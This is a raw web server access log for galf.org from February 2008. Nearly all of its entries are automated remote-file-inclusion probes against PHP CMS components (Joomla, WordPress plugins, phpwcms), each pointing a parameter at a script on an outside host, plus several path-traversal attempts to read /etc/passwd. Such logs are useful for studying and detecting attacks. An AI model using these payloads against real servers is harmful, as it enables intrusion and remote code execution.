201.34.32.66 - - [10/Feb/2008:16:00:23 -0800] "GET /logs/access_070806.log/index.php?go=http://www.vip-phone.co.hu/images/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
201.34.32.66 - - [10/Feb/2008:16:00:24 -0800] "GET /index.php?go=http://www.vip-phone.co.hu/images/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
201.34.32.66 - - [10/Feb/2008:16:00:25 -0800] "GET /logs/index.php?go=http://www.vip-phone.co.hu/images/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.159.200.63 - - [10/Feb/2008:16:05:39 -0800] "GET /logs/access.log HTTP/1.0" 200 529 "-" "Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/1.4.4" "www.galf.org"
77.91.224.17 - - [10/Feb/2008:16:13:42 -0800] "GET / HTTP/1.1" 200 1048 "-" "WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)" "www.galf.org"
67.19.192.212 - - [10/Feb/2008:16:16:06 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.suikki.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.19.192.212 - - [10/Feb/2008:16:16:06 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.suikki.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
203.105.87.124 - - [10/Feb/2008:16:22:17 -0800] "GET /logs/access_070709.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ar-vision.com/z.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.galf.org"
124.217.247.166 - - [10/Feb/2008:16:22:43 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
124.217.247.166 - - [10/Feb/2008:16:22:44 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
83.13.248.66 - - [10/Feb/2008:16:24:06 -0800] "GET //photoalb/lib/static/header.php?set_menu=http://www.immo.plocknet.eu/me.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
83.13.248.66 - - [10/Feb/2008:16:24:10 -0800] "GET /logs//photoalb/lib/static/header.php?set_menu=http://www.immo.plocknet.eu/me.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.galf.org"
80.55.35.10 - - [10/Feb/2008:16:26:22 -0800] "GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://users.volja.net/kcukd/60.php?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
86.64.194.71 - - [10/Feb/2008:16:27:13 -0800] "GET /logs/access_070709.log/index1.php?sida=http://www.albashare.net/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
86.64.194.71 - - [10/Feb/2008:16:27:13 -0800] "GET /index1.php?sida=http://www.albashare.net/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
86.64.194.71 - - [10/Feb/2008:16:27:13 -0800] "GET /logs/index1.php?sida=http://www.albashare.net/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
58.26.137.64 - - [10/Feb/2008:16:27:35 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.ispa-pecs-gis.hu/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
58.26.137.64 - - [10/Feb/2008:16:27:36 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.ispa-pecs-gis.hu/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
208.186.169.183 - - [10/Feb/2008:16:27:52 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
208.186.169.183 - - [10/Feb/2008:16:27:52 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
67.19.192.212 - - [10/Feb/2008:16:30:48 -0800] "GET /logs/access_070806.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.suikki.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.19.192.212 - - [10/Feb/2008:16:30:48 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.suikki.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.19.192.212 - - [10/Feb/2008:16:30:48 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.suikki.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.19.192.212 - - [10/Feb/2008:16:31:40 -0800] "GET /logs/access_070709.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.suikki.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.210.115.178 - - [10/Feb/2008:16:31:55 -0800] "GET /logs/access_070806.log//include.php?path[docroot]=http://www.freewebtown.com/civiclx/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.210.115.178 - - [10/Feb/2008:16:31:55 -0800] "GET /logs//include.php?path[docroot]=http://www.freewebtown.com/civiclx/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.225.219.10 - - [10/Feb/2008:16:36:44 -0800] "GET /logs/access.log/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://ia341011.us.archive.org/2/items/safe19/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
66.225.219.10 - - [10/Feb/2008:16:36:44 -0800] "GET /components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://ia341011.us.archive.org/2/items/safe19/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
66.225.219.10 - - [10/Feb/2008:16:36:44 -0800] "GET /logs/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://ia341011.us.archive.org/2/items/safe19/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
80.55.35.10 - - [10/Feb/2008:16:36:49 -0800] "GET /logs/access_070709.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://users.volja.net/kcukd/60.php?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.55.35.10 - - [10/Feb/2008:16:36:49 -0800] "GET /logs//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://users.volja.net/kcukd/60.php?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.142.106.114 - - [10/Feb/2008:16:38:17 -0800] "GET /index2.php?x=http://suwung.890m.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.galf.org"
195.142.106.114 - - [10/Feb/2008:16:38:17 -0800] "GET /logs/index2.php?x=http://suwung.890m.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.galf.org"
83.149.90.29 - - [10/Feb/2008:16:39:06 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.freewebtown.com/shadowas/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "galf.org"
83.149.90.29 - - [10/Feb/2008:16:39:06 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.freewebtown.com/shadowas/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "galf.org"
195.142.106.114 - - [10/Feb/2008:16:40:43 -0800] "GET /index.php?go=http://suwung.890m.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.galf.org"
195.142.106.114 - - [10/Feb/2008:16:40:43 -0800] "GET /logs/index.php?go=http://suwung.890m.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.galf.org"
124.217.247.166 - - [10/Feb/2008:16:52:02 -0800] "GET /logs/access_070806.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
124.217.247.166 - - [10/Feb/2008:16:52:03 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
124.217.247.166 - - [10/Feb/2008:16:52:04 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
124.217.247.166 - - [10/Feb/2008:16:53:23 -0800] "GET /logs/access_070709.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
83.149.90.29 - - [10/Feb/2008:16:58:28 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.freewebtown.com/shadowas/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "galf.org"
83.149.90.29 - - [10/Feb/2008:16:58:28 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.freewebtown.com/shadowas/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "galf.org"
213.8.154.216 - - [10/Feb/2008:16:58:55 -0800] "GET /index.php?pag=http://viperwarez.com/scan/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
213.8.154.216 - - [10/Feb/2008:16:58:55 -0800] "GET /logs/index.php?pag=http://viperwarez.com/scan/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
213.8.154.216 - - [10/Feb/2008:17:00:14 -0800] "GET /logs/index.php?pag=http://viperwarez.com/scan/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "galf.org"
213.8.154.216 - - [10/Feb/2008:17:00:14 -0800] "GET /index.php?pag=http://viperwarez.com/scan/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "galf.org"
77.232.68.10 - - [10/Feb/2008:17:01:50 -0800] "GET /logs//logs/404log.html/modules/Forums/favorites.php?=http:spiderporc.altervista.org/3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
77.232.68.10 - - [10/Feb/2008:17:01:50 -0800] "GET //logs/404log.html/modules/Forums/favorites.php?=http:spiderporc.altervista.org/3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.79.163.220 - - [10/Feb/2008:17:06:58 -0800] "GET /logs/access_070709.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.dutchstockingpage.com/myid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.79.163.220 - - [10/Feb/2008:17:06:58 -0800] "GET /logs/access_070709.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.dutchstockingpage.com/myid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.79.163.220 - - [10/Feb/2008:17:06:58 -0800] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.dutchstockingpage.com/myid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.79.163.220 - - [10/Feb/2008:17:06:58 -0800] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.dutchstockingpage.com/myid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.79.163.220 - - [10/Feb/2008:17:06:58 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.dutchstockingpage.com/myid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.79.163.220 - - [10/Feb/2008:17:06:58 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.dutchstockingpage.com/myid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.79.163.220 - - [10/Feb/2008:17:07:08 -0800] "GET /logs/access_070806.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.dutchstockingpage.com/myid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.79.163.220 - - [10/Feb/2008:17:07:09 -0800] "GET /logs/access_070806.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.dutchstockingpage.com/myid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.54.46.178 - - [10/Feb/2008:17:07:44 -0800] "GET /logs/access_070709.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.terranova.dk/files/scandiertbanner.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.54.46.178 - - [10/Feb/2008:17:07:44 -0800] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.terranova.dk/files/scandiertbanner.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.54.46.178 - - [10/Feb/2008:17:07:44 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.terranova.dk/files/scandiertbanner.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.54.46.178 - - [10/Feb/2008:17:08:03 -0800] "GET /logs/access_070806.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.terranova.dk/files/scandiertbanner.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.6.26.24 - - [10/Feb/2008:17:11:42 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
74.6.23.122 - - [10/Feb/2008:17:11:42 -0800] "GET /logs/access_071028.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
217.64.197.10 - - [10/Feb/2008:17:18:25 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://vps.istri.info/~vpsistri/images/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
217.64.197.10 - - [10/Feb/2008:17:18:25 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://vps.istri.info/~vpsistri/images/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
74.54.46.178 - - [10/Feb/2008:17:25:12 -0800] "GET /logs/access_070709.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.terranova.dk/files/scandiertbanner.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.54.46.178 - - [10/Feb/2008:17:25:12 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.terranova.dk/files/scandiertbanner.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.54.46.178 - - [10/Feb/2008:17:25:12 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.terranova.dk/files/scandiertbanner.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.8.154.216 - - [10/Feb/2008:17:28:14 -0800] "GET /default.php?page=http://viperwarez.com/scan/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "galf.org"
213.8.154.216 - - [10/Feb/2008:17:28:14 -0800] "GET /logs/default.php?page=http://viperwarez.com/scan/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "galf.org"
66.79.163.220 - - [10/Feb/2008:17:30:26 -0800] "GET /logs/access_070709.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.dutchstockingpage.com/myid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.79.163.220 - - [10/Feb/2008:17:30:26 -0800] "GET /logs/access_070709.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.dutchstockingpage.com/myid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.79.163.220 - - [10/Feb/2008:17:30:26 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.dutchstockingpage.com/myid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.79.163.220 - - [10/Feb/2008:17:30:27 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.dutchstockingpage.com/myid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.79.163.220 - - [10/Feb/2008:17:30:27 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.dutchstockingpage.com/myid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.79.163.220 - - [10/Feb/2008:17:30:27 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.dutchstockingpage.com/myid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
89.89.224.76 - - [10/Feb/2008:17:31:04 -0800] "GET /logs/access_080204.log HTTP/1.0" 200 4645442 "-" "Wget/1.10.2" "galf.org"
217.64.197.10 - - [10/Feb/2008:17:40:23 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://vps.istri.info/~vpsistri/images/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
217.64.197.10 - - [10/Feb/2008:17:40:23 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://vps.istri.info/~vpsistri/images/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
83.138.141.146 - - [10/Feb/2008:17:43:23 -0800] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://59.127.40.143//appserv/atk.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
208.116.41.19 - - [10/Feb/2008:17:46:52 -0800] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.xshqiptaretx.org/kottt/asc/securespr.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
208.116.41.19 - - [10/Feb/2008:17:46:52 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.xshqiptaretx.org/kottt/asc/securespr.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
208.116.41.19 - - [10/Feb/2008:17:46:52 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.xshqiptaretx.org/kottt/asc/securespr.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
80.55.35.10 - - [10/Feb/2008:17:49:32 -0800] "GET /logs//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://users.volja.net/kcukd/60.php?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.55.35.10 - - [10/Feb/2008:17:49:32 -0800] "GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://users.volja.net/kcukd/60.php?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.138.141.146 - - [10/Feb/2008:17:49:40 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://59.127.40.143//appserv/atk.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
80.55.35.10 - - [10/Feb/2008:17:49:40 -0800] "GET /logs//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://users.volja.net/kcukd/60.php?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.55.35.10 - - [10/Feb/2008:17:49:41 -0800] "GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://users.volja.net/kcukd/60.php?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.212.164.34 - - [10/Feb/2008:17:49:50 -0800] "GET /logs//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.pilcom.net/data/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.212.164.34 - - [10/Feb/2008:17:49:50 -0800] "GET //phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.pilcom.net/data/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
211.115.89.60 - - [10/Feb/2008:17:51:46 -0800] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://collegejacquesprevert.ca/eleves/.plugins/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
211.115.89.60 - - [10/Feb/2008:17:52:01 -0800] "GET /logs/access.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://collegejacquesprevert.ca/eleves/.plugins/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
211.115.89.60 - - [10/Feb/2008:17:52:09 -0800] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://collegejacquesprevert.ca/eleves/.plugins/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
67.212.164.34 - - [10/Feb/2008:17:52:21 -0800] "GET /logs//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.pilcom.net/data/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.212.164.34 - - [10/Feb/2008:17:52:21 -0800] "GET //phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.pilcom.net/data/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.31.183.74 - - [10/Feb/2008:17:57:35 -0800] "GET /logs/access.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=../../../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
209.31.183.74 - - [10/Feb/2008:17:57:36 -0800] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=../../../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
209.31.183.74 - - [10/Feb/2008:17:57:36 -0800] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=../../../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
83.138.141.146 - - [10/Feb/2008:17:57:48 -0800] "GET /logs//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://59.127.40.143//appserv/atk.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
83.138.141.146 - - [10/Feb/2008:17:57:49 -0800] "GET //phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://59.127.40.143//appserv/atk.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
83.138.141.146 - - [10/Feb/2008:17:58:03 -0800] "GET /logs//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://59.127.40.143//appserv/atk.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
83.138.141.146 - - [10/Feb/2008:17:58:03 -0800] "GET //phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://59.127.40.143//appserv/atk.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
83.138.141.146 - - [10/Feb/2008:18:01:10 -0800] "GET /logs/access_070806.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://59.127.40.143//appserv/atk.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
83.138.141.146 - - [10/Feb/2008:18:01:10 -0800] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://59.127.40.143//appserv/atk.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
83.138.141.146 - - [10/Feb/2008:18:01:54 -0800] "GET /logs/access_070709.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://59.127.40.143//appserv/atk.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
83.138.141.146 - - [10/Feb/2008:18:01:55 -0800] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://59.127.40.143//appserv/atk.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
83.138.141.146 - - [10/Feb/2008:18:01:55 -0800] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://59.127.40.143//appserv/atk.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
83.138.141.146 - - [10/Feb/2008:18:02:05 -0800] "GET /logs/access_070709.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://59.127.40.143//appserv/atk.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
83.138.141.146 - - [10/Feb/2008:18:02:11 -0800] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://59.127.40.143//appserv/atk.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
80.55.35.10 - - [10/Feb/2008:18:09:47 -0800] "GET /logs/access_070709.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://users.volja.net/kcukd/60.php?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.55.35.10 - - [10/Feb/2008:18:10:36 -0800] "GET /logs/access_070709.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://users.volja.net/kcukd/60.php?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.138.141.146 - - [10/Feb/2008:18:12:21 -0800] "GET /logs/access_070709.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://59.127.40.143//appserv/atk.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
83.138.141.146 - - [10/Feb/2008:18:12:21 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://59.127.40.143//appserv/atk.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
83.138.141.146 - - [10/Feb/2008:18:12:22 -0800] "GET /logs/access_070806.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://59.127.40.143//appserv/atk.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.200.96.90 - - [10/Feb/2008:18:14:54 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.200.96.90 - - [10/Feb/2008:18:14:54 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
